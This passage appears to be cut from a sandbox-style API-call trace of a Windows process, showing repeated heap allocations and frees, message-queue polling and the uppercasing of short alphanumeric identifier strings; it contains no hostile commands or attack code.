Size=0x8) returned 0x34a00a0 [0163.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0163.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0163.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0163.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0163.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0163.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0163.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0163.680] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0163.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0163.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0163.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0163.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0163.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0163.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0163.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0163.681] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0163.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0163.681] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0163.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0163.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0163.681] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0163.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0163.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0163.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6e8 [0163.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0163.681] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0163.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0163.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0163.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0163.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0163.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0163.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0163.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0163.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0163.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0163.682] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0163.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0163.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0163.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0163.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0163.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0163.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0163.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0163.682] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0163.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0163.682] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0163.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0163.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0163.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0163.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0163.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0163.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0163.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0163.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0163.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0163.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0163.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0163.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0163.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0163.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0163.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0163.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0163.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0163.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0163.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0163.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0163.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0163.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0163.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0163.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa388 [0163.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0163.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa688 [0163.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa508 [0163.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa310 [0163.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0163.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0163.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4a8 [0163.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0163.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa280 [0163.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa658 [0163.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5e0 [0163.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d978 [0163.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0163.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa370 [0163.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa670 [0163.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa568 [0163.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0163.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa340 [0163.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5b0 [0163.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0163.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0163.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0163.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0163.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0163.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0163.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0163.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0163.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0163.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0163.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0163.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0163.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0163.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0163.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0163.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0163.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0163.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0163.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0163.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0163.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0163.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0163.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0163.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0163.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0163.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0163.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0163.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0163.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0163.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0163.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0163.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0163.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0163.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0163.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0163.685] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0163.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0163.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0163.685] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0163.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0163.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0163.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0163.686] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0163.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0163.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6e8 [0163.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0163.686] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0163.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0163.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0163.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0163.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0163.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0163.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0163.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0163.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0110 [0163.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0163.686] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0163.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0163.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0163.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0163.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0163.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0163.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0163.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0163.687] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0163.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0163.687] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0163.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0163.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0163.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0163.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0163.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0163.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0163.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0163.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0163.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0163.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0163.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0163.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0163.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0163.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0163.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0163.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0163.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0163.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0163.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0163.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0163.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0163.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0163.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0163.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0163.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0163.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0163.688] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0163.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0163.688] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0163.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0163.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0163.688] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0163.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0163.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0163.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0163.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0163.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0163.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0163.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0163.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0163.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416930 | out: hHeap=0x25c0000) returned 1 [0163.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0163.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0163.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0163.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0163.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416b80 | out: hHeap=0x25c0000) returned 1 [0163.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416930 | out: hHeap=0x25c0000) returned 1 [0163.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0163.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0163.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0163.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0163.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0163.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0163.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0163.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0163.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0163.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0163.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: 